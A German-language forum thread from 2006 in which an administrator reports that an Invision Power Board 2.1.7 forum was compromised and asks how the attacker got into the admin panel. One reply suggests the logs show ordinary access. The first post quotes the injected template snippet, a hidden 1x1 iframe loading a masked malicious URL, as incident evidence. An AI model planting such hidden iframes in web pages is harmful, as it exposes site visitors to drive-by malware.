StephanM 0 Report post Posted December 6, 2006 (edited) Guten Tag, Heute morgen wurde ein von mir verwaltetes IPB in der aktuellen Version 2.1.7 gehackt. Der Angreifer hatte hierbei über den Skin Manager den "Board Wrapper" so editiert, dass ein IFrame mit schädlichen Code eingebunden wurde. Der entsprechende Ausschnitt aus dem Template lautete: <div id="ipbwrapper"> <iframe src='http://*************.net/adv/new.php?adv=150' width=1 height=1></iframe> <% BOARD HEADER %> (die URL habe ich unkenntlich gemacht). Über die Logfile des Servers lässt sich der Weg des Angreifers relativ gut nachvollziehen. Ich habe die entsprechenden Ausschnitte aus der Logfile an dieses Posting angehängt. Die Domain habe ich aus Sicherheitsgründen ebenfalls maskiert. Der Angreifer hat anscheinend die "admin.php" anfänglich per GET aufgerufen, und dann ein POST abgesetzt über welches er wohl erfolgreich ins Adminpanel vorstoßen konnte. Von dort aus hat er über den Tab "Look & Feel" das Template ganz regulär über das Admininterface verändert. Die Frage ist also: wie konnte er sich erfolgreich einloggen? Das Kennwort ist niemandem bekannt. Desweiteren hat das Kennwort eine gewisse Komplexität - mit Erraten ist da auch nichts. Der Angreifer scheint auch jemand völlig fremdes zu sein - laut Logfile verwendet er einen russischen Opera Browser und hat eine IP aus den Arabischen Emiraten ... (anonymer Proxy?). Da das Forum auf dem aktuellsten Stand ist, könnte es sich hierbei um einen bisher unbekannten Exploit handeln. //Nachtrag: Im "Administrator Logs Manager" befinden sich zu dieser Zeit keine Einträge! mit freundlichen Grüßen Stephan Munz Edited December 6, 2006 by StephanM Share this post Link to post
Christian 0 Report post Posted December 6, 2006 Schaut aber nicht nach einem Hack, sondern nach einem ganz normalen Zugriff aus. Mach mal dasselbe und vergleiche mal, das Log müsste gleich aussehen. Zumindest sehen klassiche Exploit-Logs anders aus. Share this post Link to post
StephanM 0 Report post Posted December 6, 2006 (edited) Hallo Christian, Genau das ist die Sache, die mich so sehr wundert. Man muss hier aber auch sagen, dass in der Logfile natürlich nicht hervorgeht, WAS für Daten per Post versendet wurden. Möglicherweise werden einige der Parameter vom IPB nicht korrekt verarbeitet ... und dies könnte unter bestimmten Voraussetzungen (z.B. aktiviertes Register_Globals) ausgenutzt werden. Die Logfile sagt daher nichts darüber aus, ob es ein Exploit war, oder nicht. Mein Kunde hatte mir jedoch versichert, dass das Kennwort niemandem bekannt ist. Da das Kennwort in der Datenbank zudem lediglich als MD5-Hash vorliegt, glaube ich persönlich nicht daran, dass dem Angreifer das Kennwort bekannt war. P.S.: In der Vergangenheit gab es auch bei anderen Foren Exploits, die in den Logfiles nicht eindeutig als Exploit hervorgegangen sind. Z.B. konnte man sich bei einem der wohl bekanntesten Foren durch ein modifiziertes Cookie als beliebigen Nutzer einloggen ... tja, was da als Cookie gesendet wurde, steht auch nicht in den Logs. viele Grüße Stephan Munz Edited December 6, 2006 by StephanM Share this post Link to post
